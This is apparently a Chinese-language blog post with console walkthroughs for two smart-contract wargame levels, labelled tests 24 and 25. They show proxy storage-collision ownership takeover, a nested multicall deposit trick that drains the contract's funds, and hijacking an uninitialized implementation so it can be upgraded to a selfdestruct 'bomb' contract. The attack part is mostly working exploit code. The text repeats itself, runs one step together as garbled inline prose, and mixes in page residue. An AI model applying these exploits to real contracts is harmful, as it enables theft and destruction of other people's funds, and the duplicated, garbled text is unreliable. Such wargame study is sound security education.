24.25

测试24

1.浏览器中输入：

functionSignature = {
    name: 'proposeNewAdmin',
    type: 'function',
    inputs: [
        {
            type: 'address',
            name: '_newAdmin'
        }
    ]
}

params = [player]

data = web3.eth.abi.encodeFunctionCall(functionSignature, params)

await web3.eth.sendTransaction({from: player, to: instance, data})

2.浏览器中输入：

await contract.owner() === player

// Output: true

3.浏览器中输入：

await contract.addToWhitelist(player)

4.浏览器中输入：

await getBalance(contract.address)

// Output: 0.001

5.浏览器中输入：

// deposit() method
depositData = await contract.methods["deposit()"].request().then(v => v.data)

6.浏览器中输入：

// multicall() method with param of deposit function call signature
multicallData = await contract.methods["multicall(bytes[])"].request([depositData]).then(v => v.data)

7.浏览器中输入：

await contract.multicall([multicallData, multicallData], {value: toWei('0.001')})

8.浏览器中输入：

await contract.execute(player, toWei('0.002'), 0x0)

9.浏览器中输入：

await getBalance(contract.address)

// Output: '0'

10.浏览器中输入：

await contract.setMaxBalance(player)

结束.

测试25

1.谷歌浏览器输入：

implAddr = await web3.eth.getStorageAt(contract.address, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc')

2.谷歌浏览器输入：

implAddr = '0x' + implAddr.slice(-40)

3.谷歌浏览器输入：

initializeData = web3.eth.abi.encodeFunctionSignature("initialize()")

await web3.eth.sendTransaction({ from: player, to: implAddr, data: initializeData })

4.在 Remix 中创建以下恶意合约并复制合约地址：

// SPDX-License-Identifier: MIT
pragma solidity <0.7.0;

contract BombEngine {
    function explode() public {
        selfdestruct(address(0));
    }
}

5.谷歌浏览器中输入以下代码，其中''填写刚才部署好的合约地址——'0x………………..' . bombAddr = '<BombEngine-instance-address>' explodeData = web3.eth.abi.encodeFunctionSignature("explode()") upgradeSignature = { name: 'upgradeToAndCall', type: 'function', inputs: [ { type: 'address', name: 'newImplementation' }, { type: 'bytes', name: 'data' } ] } upgradeParams = [bombAddr, explodeData] upgradeData = web3.eth.abi.encodeFunctionCall(upgradeSignature, upgradeParams）回车。 6.谷歌浏览器中输入： await web3.eth.sendTransaction({from: player, to: implAddr, data: upgradeData}) 回车后确认钱包。任务结束。

测试24

1.浏览器中输入：

functionSignature = {
    name: 'proposeNewAdmin',
    type: 'function',
    inputs: [
        {
            type: 'address',
            name: '_newAdmin'
        }
    ]
}

params = [player]

data = web3.eth.abi.encodeFunctionCall(functionSignature, params)

await web3.eth.sendTransaction({from: player, to: instance, data})

2.浏览器中输入：

await contract.owner() === player

// Output: true

3.浏览器中输入：

await contract.addToWhitelist(player)

4.浏览器中输入：

await getBalance(contract.address)

// Output: 0.001

5.浏览器中输入：

// deposit() method
depositData = await contract.methods["deposit()"].request().then(v => v.data)

6.浏览器中输入：

// multicall() method with param of deposit function call signature
multicallData = await contract.methods["multicall(bytes[])"].request([depositData]).then(v => v.data)

7.浏览器中输入：

await contract.multicall([multicallData, multicallData], {value: toWei('0.001')})

8.浏览器中输入：

await contract.execute(player, toWei('0.002'), 0x0)

9.浏览器中输入：

await getBalance(contract.address)

// Output: '0'

10.浏览器中输入：

await contract.setMaxBalance(player)

结束.

测试25

1.谷歌浏览器输入：

implAddr = await web3.eth.getStorageAt(contract.address, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc')

2.谷歌浏览器输入：

implAddr = '0x' + implAddr.slice(-40)

3.谷歌浏览器输入：

initializeData = web3.eth.abi.encodeFunctionSignature("initialize()")

await web3.eth.sendTransaction({ from: player, to: implAddr, data: initializeData })

4.在 Remix 中创建以下恶意合约并复制合约地址：

// SPDX-License-Identifier: MIT
pragma solidity <0.7.0;

contract BombEngine {
    function explode() public {
        selfdestruct(address(0));
    }
}

hujiawei

hujiawei

No activity yet

hujiawei

hujiawei

No activity yet

24.25

24.25

测试24

测试25

测试24

测试25

No activity yet

No activity yet